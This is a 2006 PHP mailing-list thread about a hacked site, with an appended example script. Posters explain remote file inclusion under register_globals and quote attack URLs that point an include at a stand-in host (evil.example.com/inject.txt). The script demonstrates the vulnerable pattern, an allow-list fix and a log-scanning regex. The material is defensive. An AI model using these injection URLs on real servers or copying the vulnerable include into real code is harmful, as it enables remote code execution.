With register_globals on, the global superarrays ($_POST, $_GET, $_REQUEST) are automatically populated into variables. With that in mind, www.example.com/index.php?path=remoteexploit.com/ would then yield include('remoteexploit.com/foo'); thus including ANY code they wish.

----- Original Message ----
From: bruce <bedouglas@xxxxxxxxxxxxx>
To: Eric Butera <digital.tarsier@xxxxxxxxx>; tedd <tedd@xxxxxxxxxxxx>
Cc: PHP General List <php-general@xxxxxxxxxxxxx>
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: Highjack?

eric...

you say "how embarrassing" regarding the $path.'foo'....

I'm curious, why/how is this simple piece of code exploitable? Assuming $path is not something that comes via the url vars (GET/POST/REQUEST), it shouldn't be able to be touched by external/client processes... similarly, the 'foo' would be static, and couldn't be munged...

thoughts/explanations...

thanks

-----Original Message-----
From: Eric Butera [mailto:digital.tarsier@xxxxxxxxx]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: Highjack?

On 11/13/06, tedd <tedd@xxxxxxxxxxxx> wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security
> which is a concern.
>
> Just this morning had a couple of my sites "highjacked". What I found
> was someone had replaced my root level index.php with their own
> index.php. You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they
> did it. Any ideas how this was done and suggestions as to how to
> prevent this from happening again?
>
> Thanks,
>
> tedd
>
> --
> -------
> http://sperling.com http://ancientstones.com http://earthstones.com
>
> --
> PHP General Mailing List (http://www.php.net/)
> To unsubscribe, visit: http://www.php.net/unsub.php
>
>

Tedd,

I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project.

I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this:

    include($path . 'script.php');

How embarrassing.

If you have access to your server logs, look for URLs such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
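The following is an added example, not code from anyone in this thread. It puts the include pattern Eric describes next to a hardened version, checks the two php.ini settings that make the pattern remotely exploitable, and runs the log search he suggests over a few constructed access-log lines. The file names, the ALLOWED_PAGES map and the sample log lines are illustrative assumptions; the exploited.php/inject.txt URL is the one from Eric's message.

```php
<?php
// Added example (not from the mailing-list thread).
// Shows why include($path . 'foo') is remote code execution under
// register_globals, what the fixed version looks like, and how to spot
// the attack in an access log.

// --- 1. The vulnerable pattern -------------------------------------------
// Under register_globals=On, a request for /index.php?path=http://evil.example.com/
// creates $path before this code runs, so include($path . 'foo') asks PHP to
// fetch and execute http://evil.example.com/foo.  extract() reproduces that
// behaviour here so the effect can be seen on any PHP version.
function vulnerable_include_target(array $query): string
{
    extract($query);          // every query parameter becomes a local variable
    return $path . 'foo';     // the string that would be passed to include()
}

// --- 2. Hardened version --------------------------------------------------
// The client picks a key from a fixed allow-list; the file path itself is
// never built from client data, so neither a URL nor ../ can be smuggled in.
const ALLOWED_PAGES = [      // assumed page map for this example
    'home'    => 'home.php',
    'contact' => 'contact.php',
];

function safe_include_target(string $page, string $baseDir = __DIR__ . '/pages'): ?string
{
    if (!array_key_exists($page, ALLOWED_PAGES)) {
        return null;          // unknown page: refuse rather than guess
    }
    return $baseDir . '/' . ALLOWED_PAGES[$page];
}

// --- 3. Configuration check -----------------------------------------------
// register_globals (removed in PHP 5.4) and allow_url_include (added in 5.2)
// are the two switches that turn a sloppy include into remote code execution.
// ini_get() returns false for a directive the running PHP no longer knows.
function risky_ini_settings(): array
{
    $risky = [];
    foreach (['register_globals', 'allow_url_include'] as $directive) {
        if (filter_var(ini_get($directive), FILTER_VALIDATE_BOOLEAN)) {
            $risky[] = $directive;
        }
    }
    return $risky;
}

// --- 4. Log check ---------------------------------------------------------
// Flags any request whose query string carries a parameter whose value is a
// URL (plain or percent-encoded): the fingerprint of a remote-include attempt.
function find_rfi_attempts(array $logLines): array
{
    $hits = [];
    foreach ($logLines as $line) {
        if (preg_match('~[?&](\w+)=(?:https?|ftp)(?:://|%3A%2F%2F)~i', $line, $m)) {
            $hits[] = ['param' => $m[1], 'line' => $line];
        }
    }
    return $hits;
}

// Constructed sample log lines (not real traffic).
$sampleLog = [
    '203.0.113.5 - - [13/Nov/2006:09:12:01 -0500] "GET /index.php?page=home HTTP/1.1" 200 512',
    '203.0.113.9 - - [13/Nov/2006:09:12:44 -0500] "GET /exploited.php?action=http://evil.example.com/inject.txt HTTP/1.1" 200 88',
    '198.51.100.7 - - [13/Nov/2006:09:13:10 -0500] "GET /index.php?path=http%3A%2F%2Fevil.example.com%2F HTTP/1.1" 200 88',
];

if (PHP_SAPI === 'cli') {
    echo "vulnerable include target: ", vulnerable_include_target(['path' => 'http://evil.example.com/']), "\n";
    echo "safe include target:       ", safe_include_target('home'), "\n";
    echo "rejected page 'http://x':  ", var_export(safe_include_target('http://x'), true), "\n";
    echo "risky ini settings:        ", implode(', ', risky_ini_settings()) ?: '(none)', "\n";
    foreach (find_rfi_attempts($sampleLog) as $hit) {
        echo "RFI attempt via '{$hit['param']}': {$hit['line']}\n";
    }
}
```

Run it with `php example.php`. The first line of output is the string the vulnerable code would hand to include(), which is exactly the remote URL Eric and the reply above describe; the last two lines are the two constructed log entries the scanner flags, one with a plain URL and one percent-encoded. The same grep-style pattern works on a real access log, but expect false positives from legitimate redirect or callback parameters that carry URLs, so review hits rather than acting on them blindly.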